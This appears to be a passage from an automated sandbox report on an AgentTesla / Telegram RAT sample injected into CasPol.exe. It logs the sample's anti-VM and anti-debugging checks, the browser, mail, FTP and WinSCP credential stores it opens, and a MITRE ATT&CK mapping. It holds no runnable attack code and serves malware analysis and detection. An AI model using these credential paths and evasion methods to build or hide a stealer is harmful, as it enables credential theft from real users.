Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924437452.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924437452.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4292

Thread sleep time: -7378697629483816s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_032A2721 rdtsc

0_2_032A2721

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9234

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_1D580C40 sldt word ptr [eax]

12_2_1D580C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	API call chain: ExitProcess graph end node			graph_0-24255
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	API call chain: ExitProcess graph end node			graph_0-24251

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924437452.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000C.00000002.6129061557.00000000012C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000C.00000002.6128128478.00000000012A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo@
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924437452.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000000C.00000002.6127221532.000000000126B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh'+
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1924797799.0000000004E79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000C.00000002.6131768096.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_74251BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_74251BFF

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_032A2721 rdtsc

0_2_032A2721

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AABF6 mov eax, dword ptr fs:[00000030h]	0_2_032AABF6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AAD1C mov ebx, dword ptr fs:[00000030h]	0_2_032AAD1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AAD1C mov eax, dword ptr fs:[00000030h]	0_2_032AAD1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A6111 mov eax, dword ptr fs:[00000030h]	0_2_032A6111
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AAD65 mov ebx, dword ptr fs:[00000030h]	0_2_032AAD65
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B19AA mov eax, dword ptr fs:[00000030h]	0_2_032B19AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B11C1 mov eax, dword ptr fs:[00000030h]	0_2_032B11C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA429 mov eax, dword ptr fs:[00000030h]	0_2_032AA429
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B2C66 mov eax, dword ptr fs:[00000030h]	0_2_032B2C66
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AAC45 mov eax, dword ptr fs:[00000030h]	0_2_032AAC45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AACD9 mov eax, dword ptr fs:[00000030h]	0_2_032AACD9

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_205D2690 LdrInitializeThunk,

12_2_205D2690

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

0_2_00403640

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Disable or Modify Tools	2 OS Credential Dumping	431 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	351 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	351 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	117 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
